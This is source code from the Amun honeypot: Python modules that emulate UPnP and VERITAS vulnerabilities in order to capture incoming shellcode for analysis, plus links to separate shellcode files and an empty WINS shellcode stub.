  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import upnp_shellcodes
 21 | 
 22 | class vuln:
 23 | 
 24 | 	def __init__(self):
 25 | 		try:
 26 | 			self.vuln_name = "UPNP Vulnerability"
 27 | 			self.stage = "SHELLCODE"
 28 | 			self.welcome_message = ""
 29 | 			self.shellcode = []
 30 | 		except KeyboardInterrupt:
 31 | 			raise
 32 | 
 33 | 	def print_message(self, data):
 34 | 		print "\n"
 35 | 		counter = 1
 36 | 		for byte in data:
 37 | 			if counter==16:
 38 | 				ausg = hex(struct.unpack('B',byte)[0])
 39 | 				if len(ausg) == 3:
 40 | 					list = str(ausg).split('x')
 41 | 					ausg = "%sx0%s" % (list[0],list[1])
 42 | 					print ausg
 43 | 				else:
 44 | 					print ausg
 45 | 				counter = 0
 46 | 			else:
 47 | 				ausg = hex(struct.unpack('B',byte)[0])
 48 | 				if len(ausg) == 3:
 49 | 					list = str(ausg).split('x')
 50 | 					ausg = "%sx0%s" % (list[0],list[1])
 51 | 					print ausg,
 52 | 				else:
 53 | 					print ausg,
 54 | 			counter += 1
 55 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 56 | 
 57 |         def getVulnName(self):
 58 |                 return self.vuln_name
 59 | 
 60 |         def getCurrentStage(self):
 61 |                 return self.stage
 62 | 
 63 | 	def getWelcomeMessage(self):
 64 |                 return self.welcome_message
 65 | 
 66 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 67 | 		try:
 68 | 			self.reply = []
 69 | 			for i in range(0,510):
 70 | 				try:
 71 | 					self.reply.append("\x00")
 72 | 				except KeyboardInterrupt:
 73 | 					raise
 74 | 			resultSet = {}
 75 | 			resultSet['vulnname'] = self.vuln_name
 76 | 			resultSet['result'] = False
 77 | 			resultSet['accept'] = False
 78 | 			resultSet['shutdown'] = False
 79 | 			resultSet['reply'] = "None"
 80 | 			resultSet['stage'] = self.stage
 81 | 			resultSet['shellcode'] = "None"
 82 | 			resultSet["isFile"] = False
 83 | 
 84 | 			if self.stage=="SHELLCODE":
 85 | 				if bytes>0:
 86 | 					#print ".::[Amun - UPNP] collecting shellcode: %s ::." % (bytes)
 87 | 					resultSet['result'] = True
 88 | 					resultSet['accept'] = True
 89 | 					resultSet['reply'] = "".join(self.reply)
 90 | 					self.shellcode.append(message)
 91 | 					self.stage = "SHELLCODE"
 92 | 					#resultSet['shellcode'] = "".join(self.shellcode)
 93 | 					return resultSet
 94 | 				else:
 95 | 					#print ".::[Amun - UPNP] finish collecting shellcode (bytes %s) ::." % (bytes)
 96 | 					self.shellcode.append(message)
 97 | 					found_shellcode = "".join(self.shellcode)
 98 | 					if len(found_shellcode)>173:
 99 | 						#print ".::[Amun - UPNP] sending to shellcodemanager (bytes %s) ::." % (len(found_shellcode))
100 | 						resultSet['result'] = False
101 | 						resultSet['accept'] = True
102 | 						resultSet['reply'] = "None"
103 | 						resultSet['shellcode'] = found_shellcode
104 | 						return resultSet
105 | 					else:
106 | 						#print ".::[Amun - UPNP] dropping (bytes %s) ::." % (len(found_shellcode))
107 | 						resultSet['result'] = False
108 | 						resultSet['accept'] = False
109 | 						resultSet['reply'] = "None"
110 | 						resultSet['shellcode'] = "None"
111 | 						return resultSet
112 | 			else:
113 | 				resultSet['result'] = False
114 | 				resultSet['accept'] = False
115 | 				resultSet['reply'] = "None"
116 | 				return resultSet
117 | 			return resultSet
118 | 		except KeyboardInterrupt:
119 | 			raise
120 | 		except StandardError, e:
121 | 			print e
122 | 			return resultSet
123 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-upnp/upnp_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-upnp/upnp_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-veritas/veritas_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import veritas_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | class vuln:
 25 | 	def __init__(self):
 26 | 		try:
 27 | 			self.vuln_name = "VERITAS Vulnerability"
 28 | 			self.stage = "SHELLCODE"
 29 | 			self.welcome_message = ""
 30 | 			self.shellcode = []
 31 | 		except KeyboardInterrupt:
 32 | 			raise
 33 | 
 34 | 	def print_message(self, data):
 35 | 		print "\n"
 36 | 		counter = 1
 37 | 		for byte in data:
 38 | 			if counter==16:
 39 | 				ausg = hex(struct.unpack("B",byte)[0])
 40 | 				if len(ausg) == 3:
 41 | 					list = str(ausg).split("x")
 42 | 					ausg = "%sx0%s" % (list[0],list[1])
 43 | 					print ausg
 44 | 				else:
 45 | 					print ausg
 46 | 				counter = 0
 47 | 			else:
 48 | 				ausg = hex(struct.unpack("B",byte)[0])
 49 | 				if len(ausg) == 3:
 50 | 					list = str(ausg).split("x")
 51 | 					ausg = "%sx0%s" % (list[0],list[1])
 52 | 					print ausg,
 53 | 				else:
 54 | 					print ausg,
 55 | 			counter += 1
 56 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 57 | 
 58 | 	def getVulnName(self):
 59 | 		return self.vuln_name
 60 | 
 61 | 	def getCurrentStage(self):
 62 | 		return self.stage
 63 | 
 64 | 	def getWelcomeMessage(self):
 65 | 		return self.welcome_message
 66 | 
 67 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 68 | 		try:
 69 | 			self.log_obj = amun_logging.amun_logging("vuln_veritas", vuLogger)
 70 | 
 71 | 			### construct standard reply
 72 | 			self.reply = random_reply[:62]
 73 | 
 74 | 			### prepare default resultSet
 75 | 			resultSet = {}
 76 | 			resultSet["vulnname"] = self.vuln_name
 77 | 			resultSet["accept"] = False
 78 | 			resultSet["result"] = False
 79 | 			resultSet["shutdown"] = False
 80 | 			resultSet["reply"] = "None"
 81 | 			resultSet["stage"] = self.stage
 82 | 			resultSet["shellcode"] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage == "SHELLCODE":
 86 | 				if bytes>0:
 87 | 					resultSet["result"] = True
 88 | 					resultSet["accept"] = True
 89 | 					resultSet['reply'] = "".join(self.reply)
 90 | 					self.shellcode.append(message)
 91 | 					self.stage = "SHELLCODE"
 92 | 					return resultSet
 93 | 				else:
 94 | 					resultSet["result"] = False
 95 | 					resultSet["accept"] = True
 96 | 					resultSet["reply"] = "None"
 97 | 					self.shellcode.append(message)
 98 | 					resultSet["shellcode"] = "".join(self.shellcode)
 99 | 					return resultSet
100 | 			else:
101 | 				resultSet["result"] = False
102 | 				resultSet["accept"] = False
103 | 				resultSet["reply"] = "None"
104 | 				return resultSet
105 | 			return resultSet
106 | 		except KeyboardInterrupt:
107 | 			raise
108 | 		except StandardError, e:
109 | 			print e
110 | 		except:
111 | 			print "VERITAS fatal error"
112 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-veritas/veritas_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-veritas/veritas_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-wins/wins_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | wins_request_stage1 = ""
4 | wins_request_stage2 = ""
5 | wins_request_stage3 = ""
6 | 


--------------------------------------------------------------------------------